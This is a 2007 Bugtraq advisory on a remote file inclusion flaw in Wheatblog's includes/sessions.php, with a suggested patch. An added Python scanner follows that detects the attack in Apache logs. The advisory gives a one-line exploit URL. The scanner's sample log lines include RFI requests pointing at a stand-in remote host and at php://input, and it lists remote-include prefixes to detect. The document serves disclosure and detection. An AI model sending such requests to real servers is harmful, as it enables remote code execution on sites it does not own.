Message-ID: <20071122093005.23597.qmail@securityfocus.com>
Date: 22 Nov 2007 09:30:05 -0000
From: security@...or.net
To: bugtraq@...urityfocus.com
Subject: Wheatblog (wB) Remote File inclusion ..

Hello,

Wheatblog (wB) Remote File inclusion ..

Tested on version 1.1; older versions are affected as well.

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@...or.net

Remote File Inclusion
file : includes/sessions.php

line 2 :
code:-
include_once("$wb_class_dir/classDatabase.php");

The variable $wb_class_dir can be controlled by a remote user, so the include path can be pointed at a remote file.

Solution

replace
code :-
include_once("$wb_class_dir/classDatabase.php");

with
code:-
// Protected By : HACKERS PAL
// Security@...or.net
// Http://WwW.SoQoR.NeT

// Block direct requests to this file, and block any request that tries to supply
// wb_class_dir itself (the value must come only from the application's config).
// Note: the original check used $_GLOBALS, which is not a PHP superglobal and is
// therefore always unset; $_REQUEST is where a client-supplied value would appear.
// $PHP_SELF / eregi() replaced with $_SERVER['PHP_SELF'] / preg_match() for PHP 7+.
if (preg_match('/sessions\.php/i', $_SERVER['PHP_SELF']) || isset($_REQUEST['wb_class_dir']))
{
 die("<h1>Forbidden 403<br> Protected By : HACKERS PAL</h1>");
}
include_once("$wb_class_dir/classDatabase.php");


Exploit : -
includes/sessions.php?wb_class_dir=[Ev!1-Sh311]?

#WwW.SoQoR.NeT
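Added example (not part of the advisory or of Wheatblog): a small Python scanner that flags requests in Apache combined-format access logs where the wb_class_dir parameter is supplied by the client, as in the exploit request above, and classifies them as remote include, path traversal, or plain client-supplied value. The log lines and IP addresses are constructed.

```python
# Added example, not part of the advisory; the sample log lines below are constructed.
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" format: client ip, ident, user, [timestamp], "request line", status ...
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

VULN_PARAM = "wb_class_dir"  # the variable the advisory names; legitimate requests never carry it
# Prefixes that make include_once() load code from elsewhere (remote URLs and PHP stream wrappers)
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:", "expect://", "\\\\")

def classify_request(target: str) -> Optional[str]:
    """Return a reason string if the request target looks like an RFI attempt, else None."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if VULN_PARAM not in params:
        return None
    value = unquote(params[VULN_PARAM][0]).strip().lower()  # second decode catches %25-encoding
    if value.startswith(REMOTE_PREFIXES):
        return f"remote include via {VULN_PARAM}={value}"
    if ".." in value:
        return f"path traversal via {VULN_PARAM}={value}"
    return f"{VULN_PARAM} set by client ({value})"  # still suspicious: config, not the request, sets it

def scan_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client ip, timestamp, reason) for every log line that looks like an attack."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if m is None:
            continue  # not a combined-format line
        reason = classify_request(m["target"])
        if reason is not None:
            hits.append((m["ip"], m["ts"], reason))
    return hits

SAMPLE_LOG = [  # constructed sample lines using RFC 5737 documentation addresses
    '203.0.113.5 - - [22/Nov/2007:09:30:05 +0000] "GET /blog/includes/sessions.php?wb_class_dir=http://198.51.100.7/evil.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [22/Nov/2007:09:31:10 +0000] "GET /blog/includes/sessions.php?wb_class_dir=%252e%252e%252fconfig HTTP/1.1" 200 233 "-" "curl/7.16"',
    '192.0.2.44 - - [22/Nov/2007:09:32:00 +0000] "GET /blog/index.php?page=2 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [22/Nov/2007:09:33:45 +0000] "GET /blog/includes/sessions.php?wb_class_dir=php://input HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, reason in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {reason}")
```

Any hit is worth investigating regardless of the response status, since with register_globals enabled the include happens before the page body is produced.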
